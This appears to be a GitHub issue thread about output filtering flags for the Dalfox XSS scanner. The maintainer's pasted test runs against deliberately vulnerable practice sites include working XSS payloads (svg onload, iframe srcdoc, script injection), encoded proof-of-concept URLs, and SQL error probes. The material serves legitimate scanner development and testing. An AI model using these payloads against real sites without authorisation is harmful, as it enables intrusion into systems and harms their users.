Add option not to show [R]

[hahwul]

from @leo__rac

Hi! Is there an option on dalfox to skip the [R] findings?
Or grepping on result is the only possibility right now?

[hahwul]

flag name:

• --verbose "g,r,v"
• --filter= "g,r,v"
• --match= "g,r,v"
• --only-poc="g,r,v"

[hahwul]

Test

$  ./dalfox url https://xss-game.appspot.com/level1/frame\?d\=fd --only-poc r
[I] Reflected query param => Injected: /inHTML-none(1)  $  {  `  +  '  (  "  .  )  }  >  -  ]  [  |  <  ;  :  =  \  ,
    13 line:  Sorry, no results were found for <b>DalFox</b>. <a href='?'>Try again
[V] Triggered XSS Payload (found DOM Object): query=</script><svg><script/class=dalfox>alert(1)</script>-%26apos;
    13 line:  s were found for <b></script><svg><script/class=dalfox>alert(1)</script>-%26apos
[*] Finish Scaneries][99.65%] Passing "query" param queries and waiting headless

$  ./dalfox url https://xss-game.appspot.com/level1/frame\?d\=fd --only-poc v
[I] Reflected query param => Injected: /inHTML-none(1)  '  {  )  (  -  |  [  \  .  ,  +  :  "  $  }  =  ]  ;  <  `  >
    13 line:  Sorry, no results were found for <b>DalFox</b>. <a href='?'>Try again
[V] Triggered XSS Payload (found DOM Object): query='"><iframe srcdoc="<input onauxclick=alert(1)>" class=dalfox></iframe>
    13 line:  s were found for <b>'"><iframe srcdoc="<input onauxclick=alert(1)>" class=dalfox
[POC][V][GET] https://xss-game.appspot.com/level1/frame?d=fd&query=%27%22%3E%3Ciframe+srcdoc%3D%22%3Cinput+onauxclick%3Dalert%281%29%3E%22+class%3Ddalfox%3E%3C%2Fiframe%3E

multiple case

$ ./dalfox url http://testphp.vulnweb.com/listproducts.php --only-poc g,r
[G] Found dalfox-error-mysql via built-in grepping / original request
    Warning: mysql_fetch_array() expects parameter 1 to be resource, null given in /hj/var/www/listproducts.php on line 74
[POC][G][BUILT-IN/dalfox-error-mysql/GET] http://testphp.vulnweb.com/listproducts.php
[G] Found dalfox-error-mysql2 via built-in grepping / original request
    Warning: mysql
[POC][G][BUILT-IN/dalfox-error-mysql2/GET] http://testphp.vulnweb.com/listproducts.php
[I] Found 2 testing point in DOM base parameter mining
[G] Found dalfox-error-mysql1 via built-in grepping / payload: dalfox:
    SQL syntax; check the manual that corresponds to your MySQL
[POC][G][BUILT-IN/dalfox-error-mysql1/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3A
[G] Found dalfox-error-mysql5 via built-in grepping / payload: dalfox:
    check the manual that corresponds to your MySQL server version
[POC][G][BUILT-IN/dalfox-error-mysql5/GET] http://testphp.vulnweb.com/listproducts.php?cat=dalfox%3A
[I] Found 1 testing point in Dictionary base paramter mining
[I] Content-Type is text/html; charset=UTF-8
[I] Reflected cat param => Injected: /inHTML-none(1)  $
    48 line:  	Error: Unknown column 'DalFox' in 'where cl
[W] Reflected Payload in HTML: cat=<sVg/onload=prompt(1)>
    48 line:  yntax to use near '=<sVg/onload=prompt(1)>' at line 1
[POC][R][GET] http://testphp.vulnweb.com/listproducts.php?cat=%3CsVg%2Fonload%3Dprompt%281%29%3E
[V] Triggered XSS Payload (found DOM Object): cat='><sVg/onload=alert(1) class=dalfox>
    48 line:  syntax to use near ''><sVg/onload=alert(1) class=dalfox>' at line 1